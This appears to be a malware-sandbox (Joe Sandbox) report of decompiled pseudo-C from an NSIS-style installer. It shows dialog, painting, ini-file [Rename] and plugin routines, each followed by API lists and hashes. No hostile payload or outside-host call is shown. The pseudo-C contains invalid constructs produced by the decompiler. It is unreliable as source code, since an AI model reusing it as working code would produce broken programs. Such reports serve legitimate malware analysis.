                                                            					}
                                                            				} else {
                                                            					_v36 = 0;
                                                            					 *0x452480 = _a4;
                                                            					_v20 = 2;
                                                            					 *0x43c088 = GlobalAlloc(0x40,  *0x45244c << 2);
                                                            					_t264 = LoadImageA( *0x452420, 0x6e, 0, 0, 0, 0);
                                                            					 *0x43c07c =  *0x43c07c | 0xffffffff;
                                                            					_v16 = _t264;
                                                            					 *0x43c084 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
                                                            					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                            					 *0x43c074 = _t266;
                                                            					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                            					SendMessageA(_v8, 0x1109, 2,  *0x43c074);
                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                            						SendMessageA(_v8, 0x111b, _t320, 0);
                                                            					}
                                                            					DeleteObject(_v16);
                                                            					_t327 = 0;
                                                            					do {
                                                            						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                            						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                            							if(_t327 != 0x20) {
                                                            								_v20 = 0;
                                                            							}
                                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
                                                            						}
                                                            						_t327 = _t327 + 1;
                                                            					} while (_t327 < 0x21);
                                                            					_t328 = _a16;
                                                            					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                            					_push(0x15);
                                                            					E004042D4(_a4);
                                                            					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                            					_push(0x16);
                                                            					E004042D4(_a4);
                                                            					_t329 = 0;
                                                            					_v16 = 0;
                                                            					if( *0x45244c <= 0) {
                                                            						L19:
                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                            						goto L20;
                                                            					} else {
                                                            						_t316 = _v24 + 8;
                                                            						_v32 = _t316;
                                                            						do {
                                                            							_t284 =  &(_t316[0x10]);
                                                            							if( *_t284 != 0) {
                                                            								_v64 = _t284;
                                                            								_t285 =  *_t316;
                                                            								_v88 = _v16;
                                                            								_t308 = 0x20;
                                                            								_v84 = 0xffff0002;
                                                            								_v80 = 0xd;
                                                            								_v68 = _t308;
                                                            								_v44 = _t329;
                                                            								_v72 = _t285 & _t308;
                                                            								if((_t285 & 0x00000002) == 0) {
                                                            									if((_t285 & 0x00000004) == 0) {
                                                            										 *( *0x43c088 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                            									} else {
                                                            										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                            									}
                                                            								} else {
                                                            									_v80 = 0x4d;
                                                            									_v48 = 1;
                                                            									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                            									_v36 = 1;
                                                            									 *( *0x43c088 + _t329 * 4) = _t290;
                                                            									_v16 =  *( *0x43c088 + _t329 * 4);
                                                            								}
                                                            							}
                                                            							_t329 = _t329 + 1;
                                                            							_t316 =  &(_v32[0x2018]);
                                                            							_v32 = _t316;
                                                            						} while (_t329 <  *0x45244c);
                                                            						if(_v36 != 0) {
                                                            							L20:
                                                            							if(_v20 != 0) {
                                                            								E00404309(_v8);
                                                            								goto L23;
                                                            							} else {
                                                            								ShowWindow(_v12, 5);
                                                            								E00404309(_v12);
                                                            								L93:
                                                            								return E0040433B(_a8, _a12, _a16);
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                            • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                            • SendMessageA.USER32 ref: 00404DB9
                                                            • SendMessageA.USER32 ref: 00404DC5
                                                            • SendMessageA.USER32 ref: 00404DD5
                                                            • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                            • SendMessageA.USER32 ref: 00404E05
                                                            • SendMessageA.USER32 ref: 00404E11
                                                            • SendMessageA.USER32 ref: 00404EAB
                                                            • SendMessageA.USER32 ref: 00404EDB
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • SendMessageA.USER32 ref: 00404EEF
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                            • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                            • SendMessageA.USER32 ref: 00405036
                                                            • SendMessageA.USER32 ref: 0040509B
                                                            • SendMessageA.USER32 ref: 004050B0
                                                            • SendMessageA.USER32 ref: 004050D4
                                                            • SendMessageA.USER32 ref: 004050F4
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405109
                                                            • GlobalFree.KERNEL32(?), ref: 00405119
                                                            • SendMessageA.USER32 ref: 00405192
                                                            • SendMessageA.USER32 ref: 0040523B
                                                            • SendMessageA.USER32 ref: 0040524A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                            • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                            • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                            • ShowWindow.USER32(00000000), ref: 004052D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction ID: 1a89480aaa14410690893e3e2f323560a6be9801fb1e0a4c64b47d85f3ee2a2e
                                                            • Opcode Fuzzy Hash: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction Fuzzy Hash: A90268B0900209EFEB149FA4CD85AAE7BB5FB45314F14817AF614BA2E1C7788E41DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				struct HWND__* _t52;
                                                            				long _t86;
                                                            				int _t98;
                                                            				struct HWND__* _t99;
                                                            				signed int _t100;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t109;
                                                            				int _t110;
                                                            				signed int* _t112;
                                                            				signed int _t113;
                                                            				char* _t114;
                                                            				CHAR* _t115;
                                                            
                                                            				if(_a8 != 0x110) {
                                                            					if(_a8 != 0x111) {
                                                            						L11:
                                                            						if(_a8 != 0x4e) {
                                                            							if(_a8 == 0x40b) {
                                                            								 *0x43405c =  *0x43405c + 1;
                                                            							}
                                                            							L25:
                                                            							_t110 = _a16;
                                                            							L26:
                                                            							return E0040433B(_a8, _a12, _t110);
                                                            						}
                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                            						_t110 = _a16;
                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                            							_v12 = _t100;
                                                            							_v16 = _t109;
                                                            							_v8 = 0x44a3c0;
                                                            							if(_t100 - _t109 < 0x4000) {
                                                            								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                            								SetCursor(LoadCursorA(0, 0x7f02));
                                                            								_push(1);
                                                            								E004046E3(_a4, _v8);
                                                            								SetCursor(LoadCursorA(0, 0x7f00));
                                                            								_t110 = _a16;
                                                            							}
                                                            						}
                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                            							goto L26;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                            								SendMessageA( *0x452428, 0x111, 1, 0);
                                                            							}
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                            								SendMessageA( *0x452428, 0x10, 0, 0);
                                                            							}
                                                            							return 1;
                                                            						}
                                                            					}
                                                            					if(_a12 >> 0x10 != 0 ||  *0x43405c != 0) {
                                                            						goto L25;
                                                            					} else {
                                                            						_t103 =  *0x438068; // 0x720a3c
                                                            						_t25 = _t103 + 0x14; // 0x720a50
                                                            						_t112 = _t25;
                                                            						if(( *_t112 & 0x00000020) == 0) {
                                                            							goto L25;
                                                            						}
                                                            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                            						E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                            						E004046BF();
                                                            						goto L11;
                                                            					}
                                                            				}
                                                            				_t98 = _a16;
                                                            				_t113 =  *(_t98 + 0x30);
                                                            				if(_t113 < 0) {
                                                            					_t113 =  *( *0x44e3fc - 4 + _t113 * 4);
                                                            				}
                                                            				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                            				_t114 = _t113 +  *0x452458;
                                                            				_push(0x22);
                                                            				_a16 =  *_t114;
                                                            				_v12 = _v12 & 0x00000000;
                                                            				_t115 = _t114 + 1;
                                                            				_v16 = _t115;
                                                            				_v8 = E0040440A;
                                                            				E004042D4(_a4);
                                                            				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                            				_push(0x23);
                                                            				E004042D4(_a4);
                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                            				E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                            				_t99 = GetDlgItem(_a4, 0x3e8);
                                                            				E00404309(_t99);
                                                            				SendMessageA(_t99, 0x45b, 1, 0);
                                                            				_t86 =  *( *0x452430 + 0x68);
                                                            				if(_t86 < 0) {
                                                            					_t86 = GetSysColor( ~_t86);
                                                            				}
                                                            				SendMessageA(_t99, 0x443, 0, _t86);
                                                            				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                            				 *0x43405c = 0;
                                                            				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                            				 *0x43405c = 0;
                                                            				return 0;
                                                            			}


                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: D@$<r$Call$N
                                                            • API String ID: 3103080414-936878463
                                                            • Opcode ID: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction ID: 2bd06c0691c76b957e6ebeae131719b0bc75d5682994f338a7987809ed17278e
                                                            • Opcode Fuzzy Hash: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction Fuzzy Hash: A661A1B1A40309BFEB109F61DC45B6A3B68EB85714F10443AFB04BB1D1D7B9A9618F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				struct tagRECT _v32;
                                                            				struct tagPAINTSTRUCT _v96;
                                                            				struct HDC__* _t70;
                                                            				struct HBRUSH__* _t87;
                                                            				struct HFONT__* _t94;
                                                            				long _t102;
                                                            				signed int _t126;
                                                            				struct HDC__* _t128;
                                                            				intOrPtr _t130;
                                                            
                                                            				if(_a8 == 0xf) {
                                                            					_t130 =  *0x452430;
                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                            					_a8 = _t70;
                                                            					GetClientRect(_a4,  &_v32);
                                                            					_t126 = _v32.bottom;
                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                            					while(_v32.top < _t126) {
                                                            						_a12 = _t126 - _v32.top;
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                            						_v32.bottom = _v32.bottom + 4;
                                                            						_a16 = _t87;
                                                            						FillRect(_a8,  &_v32, _t87);
                                                            						DeleteObject(_a16);
                                                            						_v32.top = _v32.top + 4;
                                                            					}
                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                            						_a16 = _t94;
                                                            						if(_t94 != 0) {
                                                            							_t128 = _a8;
                                                            							_v32.left = 0x10;
                                                            							_v32.top = 8;
                                                            							SetBkMode(_t128, 1);
                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                            							_a8 = SelectObject(_t128, _a16);
                                                            							DrawTextA(_t128, 0x44e420, 0xffffffff,  &_v32, 0x820);
                                                            							SelectObject(_t128, _a8);
                                                            							DeleteObject(_a16);
                                                            						}
                                                            					}
                                                            					EndPaint(_a4,  &_v96);
                                                            					return 0;
                                                            				}
                                                            				_t102 = _a16;
                                                            				if(_a8 == 0x46) {
                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x452428;
                                                            				}
                                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                            			}


                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,0044E420,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction ID: 0bd4ef5fed811bbf4bded0a7f85d82f2f783d311ad13c466ed52a022670cf4ac
                                                            • Opcode Fuzzy Hash: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction Fuzzy Hash: E7417C71800209AFCF058FA5DE459AFBFB9FF45315F00802AF991AA1A0C774EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405EC0(void* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				long _t12;
                                                            				long _t24;
                                                            				char* _t31;
                                                            				int _t37;
                                                            				void* _t38;
                                                            				intOrPtr* _t39;
                                                            				long _t42;
                                                            				CHAR* _t44;
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            
                                                            				_t38 = __ecx;
                                                            				_t44 =  *(_t52 + 0x14);
                                                            				 *0x448620 = 0x4c554e;
                                                            				if(_t44 == 0) {
                                                            					L3:
                                                            					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x448a20, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						_t37 = wsprintfA(0x448220, "%s=%s\r\n", 0x448620, 0x448a20);
                                                            						_t53 = _t52 + 0x10;
                                                            						E004062EA(_t37, 0x400, 0x448a20, 0x448a20,  *((intOrPtr*)( *0x452430 + 0x128)));
                                                            						_t12 = E00405DEA(0x448a20, 0xc0000000, 4);
                                                            						_t48 = _t12;
                                                            						 *(_t53 + 0x18) = _t48;
                                                            						if(_t48 != 0xffffffff) {
                                                            							_t42 = GetFileSize(_t48, 0);
                                                            							_t6 = _t37 + 0xa; // 0xa
                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                            							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
                                                            								L18:
                                                            								return CloseHandle(_t48);
                                                            							} else {
                                                            								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
                                                            									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
                                                            									if(_t49 == 0) {
                                                            										_t48 =  *(_t53 + 0x18);
                                                            										L16:
                                                            										_t24 = _t42;
                                                            										L17:
                                                            										E00405DA5(_t24 + _t46, 0x448220, _t37);
                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                            										E00405E91(_t48, _t46, _t42 + _t37);
                                                            										GlobalFree(_t46);
                                                            										goto L18;
                                                            									}
                                                            									_t39 = _t46 + _t42;
                                                            									_t31 = _t39 + _t37;
                                                            									while(_t39 > _t49) {
                                                            										 *_t31 =  *_t39;
                                                            										_t31 = _t31 - 1;
                                                            										_t39 = _t39 - 1;
                                                            									}
                                                            									_t24 = _t49 - _t46 + 1;
                                                            									_t48 =  *(_t53 + 0x18);
                                                            									goto L17;
                                                            								}
                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                            								_t42 = _t42 + 0xa;
                                                            								goto L16;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					CloseHandle(E00405DEA(_t44, 0, 1));
                                                            					_t12 = GetShortPathNameA(_t44, 0x448620, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				return _t12;
                                                            			}




















                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405EF1
                                                            • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                            • wsprintfA.USER32 ref: 00405F35
                                                            • GetFileSize.KERNEL32(00000000,00000000,00448A20,C0000000,00000004,00448A20,?,?,?,?,?), ref: 00405F70
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                            • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,00448220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00406025
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %s=%s$[Rename]
                                                            • API String ID: 2171350718-1727408572
                                                            • Opcode ID: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction ID: a927ddba45d5df7a47f9583d2fa9cd5bb3fc37aebfc63fa68c1436a548016810
                                                            • Opcode Fuzzy Hash: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction Fuzzy Hash: 7C310531200B166BC2207B659D48F6B7A9CEF49758F15043FFA42F62D2DB7CD8118AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				long _t39;
                                                            				long _t41;
                                                            				void* _t44;
                                                            				signed char _t50;
                                                            				long* _t54;
                                                            
                                                            				if(_a4 + 0xfffffecd > 5) {
                                                            					L18:
                                                            					return 0;
                                                            				}
                                                            				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                            					goto L18;
                                                            				} else {
                                                            					_t50 = _t54[5];
                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                            						goto L18;
                                                            					}
                                                            					_t39 =  *_t54;
                                                            					if((_t50 & 0x00000002) != 0) {
                                                            						_t39 = GetSysColor(_t39);
                                                            					}
                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                            						SetTextColor(_a8, _t39);
                                                            					}
                                                            					SetBkMode(_a8, _t54[4]);
                                                            					_t41 = _t54[1];
                                                            					_v16.lbColor = _t41;
                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                            						_t41 = GetSysColor(_t41);
                                                            						_v16.lbColor = _t41;
                                                            					}
                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                            						SetBkColor(_a8, _t41);
                                                            					}
                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                            						_v16.lbStyle = _t54[2];
                                                            						_t44 = _t54[3];
                                                            						if(_t44 != 0) {
                                                            							DeleteObject(_t44);
                                                            						}
                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                            					}
                                                            					return _t54[3];
                                                            				}
                                                            			}










                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                            • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E73C22128(intOrPtr* _a4) {
                                                            				short _v84;
                                                            				intOrPtr* _t24;
                                                            				signed int _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t33;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            
                                                            				_t39 = E73C212C6();
                                                            				_t24 = _a4;
                                                            				_t33 =  *((intOrPtr*)(_t24 + 0x814));
                                                            				_t42 = (_t33 + 0x41 << 5) + _t24;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
                                                            					}
                                                            					_t25 =  *(_t42 - 8) & 0x000000ff;
                                                            					if(_t25 <= 7) {
                                                            						switch( *((intOrPtr*)(_t25 * 4 +  &M73C22268))) {
                                                            							case 0:
                                                            								 *_t39 = 0;
                                                            								goto L17;
                                                            							case 1:
                                                            								__edx =  *__edx;
                                                            								if(__ecx > 0) {
                                                            									__ecx = __ecx - 1;
                                                            									__ecx = __ecx *  *(0x73c24060 + __eax * 4);
                                                            									asm("sbb eax, eax");
                                                            									__edx = __edx &  *(0x73c24080 + __eax * 4);
                                                            								}
                                                            								_push(__edx);
                                                            								goto L15;
                                                            							case 2:
                                                            								_push(__edi);
                                                            								_push(__edx[1]);
                                                            								_push( *__edx);
                                                            								__eax = E73C2144D(__ecx);
                                                            								goto L16;
                                                            							case 3:
                                                            								__eax = lstrcpynA(__edi,  *__edx,  *0x73c25040);
                                                            								goto L17;
                                                            							case 4:
                                                            								__ecx =  *0x73c25040;
                                                            								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
                                                            								__eax =  *0x73c25040;
                                                            								 *((char*)(__eax + __edi - 1)) = 0;
                                                            								goto L17;
                                                            							case 5:
                                                            								_push(0x27);
                                                            								__eax =  &_v84;
                                                            								_push( &_v84);
                                                            								_push( *__edx);
                                                            								__imp__StringFromGUID2();
                                                            								__ecx = 0;
                                                            								__eax =  &_v84;
                                                            								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73c25040, 0, 0);
                                                            								goto L17;
                                                            							case 6:
                                                            								_push( *__esi);
                                                            								L15:
                                                            								__eax = wsprintfA(__edi, 0x73c24058);
                                                            								L16:
                                                            								__esp = __esp + 0xc;
                                                            								goto L17;
                                                            						}
                                                            					}
                                                            					L17:
                                                            					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
                                                            						GlobalFree( *(_t42 + 0x14));
                                                            					}
                                                            					_t26 =  *((intOrPtr*)(_t42 + 0xc));
                                                            					if(_t26 != 0) {
                                                            						if(_t26 != 0xffffffff) {
                                                            							if(_t26 > 0) {
                                                            								E73C215C7(_t26 - 1, _t39);
                                                            								goto L26;
                                                            							}
                                                            						} else {
                                                            							E73C2157E(_t39);
                                                            							L26:
                                                            						}
                                                            					}
                                                            					_t42 = _t42 - 0x20;
                                                            					_t33 = _t33 - 1;
                                                            				} while (_t33 >= 0);
                                                            				return GlobalFree(_t39);
                                                            			}











                                                            APIs
                                                              • Part of subcall function 73C212C6: GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C2225D
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 3e5b46107e6976e0ed326ad21c51fc1522a9cbbfee95e31528e3cf28d7ba1ffb
                                                            • Instruction ID: 63c18371d5a97deb19b4540191ac693de60c0540b6804247fe0fd059a9918587
                                                            • Opcode Fuzzy Hash: 3e5b46107e6976e0ed326ad21c51fc1522a9cbbfee95e31528e3cf28d7ba1ffb
                                                            • Instruction Fuzzy Hash: 1D412232114248EFE716DF56CC45F2ABFB9FB55312F110129F90ADA191DB72AC80CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
                                                            				long _v8;
                                                            				signed char _v12;
                                                            				unsigned int _v16;
                                                            				void* _v20;
